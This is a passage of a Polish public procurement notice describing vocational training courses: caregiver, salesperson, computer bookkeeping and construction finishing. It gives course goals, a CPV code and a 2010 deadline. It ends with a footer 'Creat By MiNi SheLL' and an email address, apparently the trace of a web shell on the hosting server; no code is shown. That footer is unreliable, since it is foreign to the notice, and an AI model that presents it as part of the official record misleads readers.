- wykonać podstawowe czynności związane z funkcjonowaniem gospodarstwa domowego podopiecznego, 
- przygotować posiłki według ogólnych lub specjalnych zasad żywienia, 
- wspomagać podopiecznego w pokonywaniu trudności życiowych, z uwzględnieniem odpowiedzialności cywilnej i zasad etyczno-moralnych, 
- udzielić pierwszej pomocy w sytuacji zagrożenia życia lub czasowej niedyspozycji. 
Wykonawca odpowiedzialny będzie za badania lekarskie i sanepidowskie (w przepadku szkolenia, które wymaga takiego badania).
4.	Nowoczesny sprzedawca	Celem szkolenia jest nabycie przez kursantów umiejętności i wiedzy niezbędnej do wykonywania pracy na stanowisku sprzedawcy z wykorzystaniem sprzętu komputerowego, kasy fiskalnej i terminala kart płatniczych oraz zapoznanie się z zasadami etyki w zawodzie sprzedawcy. 
Cele ogólne: 
Przygotowanie uczestników szkolenia w zakresie: 
- Przestrzegania zasad bezpieczeństwa i higieny pracy i w jednostce handlowej 
- Organizacji handlu w gospodarce rynkowej 
- Organizacji sprzedaży detalicznej 
- Organizacji zaopatrzenia i przyjmowania dostaw towarów 
- Wykonywania i dokumentowania podstawowych obliczeń sklepowych 
- Obsługiwania klienta, przebiegu sprzedaży detalicznej 
Oczekiwane rezultaty: 
Szkolenie winno przyczynić się do uzyskania umiejętności zawodowych w zakresie pracy Nowoczesnego sprzedawcy, w wyniku czego absolwent kursu winien umieć:                                                                                                               - Przestrzegać zasad bezpieczeństwa i higieny pracy w jednostce handlowej 
- Zorganizować sprzedaż detaliczną 
- Organizować zaopatrzenie oraz przyjmować dostawy towarów 
- Wykonać i udokumentować podstawowe obliczenia sklepowe 
- Obsługiwać klienta przy użyciu różnych form sprzedaży 
Wykonawca odpowiedzialny będzie za badania lekarskie i sanepidowskie (w przepadku szkolenia, które wymaga takiego badania).
5	Księgowość komputerowa	Celem szkolenia jest przygotowanie do pracy w charakterze księgowego dla potrzeb małych i średnich przedsiębiorstw prowadzących księgę przychodów i rozchodów. 
W świetle aktualnych potrzeb praca księgowego wymaga nie tylko wiedzy z zakresu rachunkowości, ale również umiejętności w zakresie technik informatycznych umożliwiających wykorzystanie odpowiednich komputerowych programów finansowo-księgowych. 
Cele ogólne 
Celem ogólnym szkolenia jest przygotowanie do prowadzenia książki przychodów i rozchodów z wykorzystaniem komputera. 
Zakłada się, że po zakończonym procesie kształcenia uczestnicy szkolenia będą przygotowani do następujących zadań: 
- rozpoznawanie zasad rachunkowości podmiotów prowadzących księgę przychodów i rozchodów, 
- przygotowanie programu komputerowego do prowadzenia księgi przychodów i rozchodów, 
- ewidencjonowanie zdarzeń gospodarczych przychodów w księdze przychodów i rozchodów oraz ich dokumentowanie 
- rozliczenie przedsiębiorstwa z otoczeniem.                                                                  Oczekiwane rezultaty 
Założone cele kształcenia i zakres tematyczny szkolenia winny być skierowane na kształtowanie praktycznych umiejętności w zakresie prowadzenia księgowości dla potrzeb małego przedsiębiorstwa. 
Po zakończonym procesie kształcenia absolwent szkolenia winien potrafić: 
- identyfikować przepisy prawne regulujące prowadzenie księgowości, ze szczególnym uwzględnieniem potrzeb małego przedsiębiorstwa prowadzącego księgę przychodów 
i rozchodów, 
- przygotować komputer do prowadzenia księgi przychodów i rozchodów na bazie odpowiedniego programu finansowo-księgowego, 
- otworzyć, prowadzić oraz zamknąć okres obrachunkowy w elektronicznej księdze przychodów i rozchodów, 
- sporządzić typowe dokumenty towarzyszące pracom księgowym dla potrzeb małego przedsiębiorstwa, 
- zabezpieczyć i archiwizować informacje księgowe. 
6.	Pracownik robót wykończeniowych                w budownictwie	Podstawowym celem szkolenia jest przygotowanie uczestnika do wykonywania prac remontowo-budowlanych zarówno wewnątrz jak i na zewnątrz budynków. Zagadnienia omawiane podczas szkolenia to przede wszystkim: pojęcia i cele robót wykończeniowych, materiały, maszyny i urządzenia stosowane w pracach wykończeniowych, technologie wykonania poszczególnych robót wykończeniowych, Przepisy bhp i p.poż. 
Cele ogólne: 
Program winien zakładać uzyskanie niezbędnych umiejętności praktycznych, takich jak: Kalkulacja zawodowa, rysunek zawodowy, technologia z materiałoznawstwem, nowoczesne techniki stosowane w budownictwie, narzędzia, maszyny i urządzenia wykorzystywane w pracach murarskich i tynkarskich, osadzanie i wykańczanie stolarki budowlanej, malowanie, szpachlowanie, stawianie ścian kartonowo - gipsowych, podwieszanie sufitów, układanie glazury i terakoty, zajęcia praktyczne, bezpieczeństwo i higiena pracy, metody aktywnego poszukiwania pracy.                                                  Program powinien obejmować podstawowy poziom szkolenia w wymiarze 200 godzin realizacji zajęć, głównie w formie pokazów z instruktażem, ćwiczeń i ewentualnie zadań produkcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com